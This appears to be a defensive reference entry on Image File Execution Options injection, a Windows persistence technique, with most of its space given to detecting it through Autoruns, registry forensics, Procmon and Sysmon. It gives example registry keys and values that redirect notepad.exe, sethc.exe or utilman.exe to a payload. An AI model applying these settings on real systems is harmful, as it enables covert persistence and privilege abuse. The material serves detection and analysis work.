Image File Execution Options Injection
Malware sets a Debugger value under an Image File Execution Options key so its payload launches whenever the targeted executable is started.
Image File Execution Options (IFEO) is a legitimate developer feature that lets engineers attach a debugger to a process the instant it launches. When the Windows loader is about to start program.exe, it first checks for an IFEO subkey named after that executable. If a Debugger value is present, Windows launches the named debugger and passes the original program as an argument — the original program never runs on its own.
Attackers abuse this by pointing the Debugger value at their own payload. Setting it on a frequently launched or security-relevant binary (browsers, AV consoles, or accessibility tools) gives reliable execution under the privileges of whatever triggers the original program. Because the key lives under HKLM, modifying it requires administrative rights, but it survives reboots and is rarely inspected by users.
A related variant uses the GlobalFlag, MonitorProcess, and Silent Process Exit (SilentProcessExit) keys to launch a payload when a target process exits rather than starts, which evades analysts watching only for launch-time hooks.
How it works
The loader resolves the IFEO subkey by the executable's base name and reads the Debugger value:
Key: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe
Name: Debugger
Data: C:\Users\Public\payload.exeWhen a user launches notepad.exe, Windows instead executes C:\Users\Public\payload.exe notepad.exe. The Silent Process Exit variant lives under a parallel hive:
Key: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\<target>.exe
Name: MonitorProcess
Data: C:\Users\Public\payload.exeA classic destructive pairing targets sethc.exe or utilman.exe with Debugger = cmd.exe, but operators more often point at a custom binary. The targeted process name and the debugger path are the two load-bearing artifacts.
Detection & analysis
Static analysis:
- In a captured sample, look for the literal subkey string
Image File Execution Options(orSilentProcessExit) and the value nameDebugger/MonitorProcess, plus calls toRegSetValueExW/RegCreateKeyExW. Obfuscated droppers build these as stack strings — run FLOSS first. - Triage a live or imaged host with Autoruns (Sysinternals): the "Image Hijacks" tab enumerates every IFEO
Debuggerentry and flags unsigned or unverified targets. "Hide Microsoft Entries" isolates the suspicious ones quickly. - Offline registry forensics: parse the
SOFTWAREhive with RegRipper or Registry Explorer under...\Image File Execution Optionsand...\SilentProcessExit. The subkey's last-write timestamp dates the infection, and anyDebuggervalue pointing outside%SystemRoot%is suspect.
Dynamic analysis:
- Run the sample under Procmon filtered on
Operation is RegSetValueandPath contains Image File Execution Optionsto capture the targeted executable and debugger path as they are written. - Sysmon Event ID 13 (RegistryEvent: Value Set) records the
Debugger/MonitorProcesswrite with the writing process image. Sysmon Event ID 1 then shows the anomalous parent/child chain (e.g.,payload.exespawned with the original program name as its argument).
Detection rule hint:
Alert on any write of a Debugger value under ...\Image File Execution Options\* or a MonitorProcess value under ...\SilentProcessExit\*, especially when the data is an unsigned binary outside %SystemRoot%\System32. A process whose command line contains another executable's name passed as the first argument is a strong runtime indicator.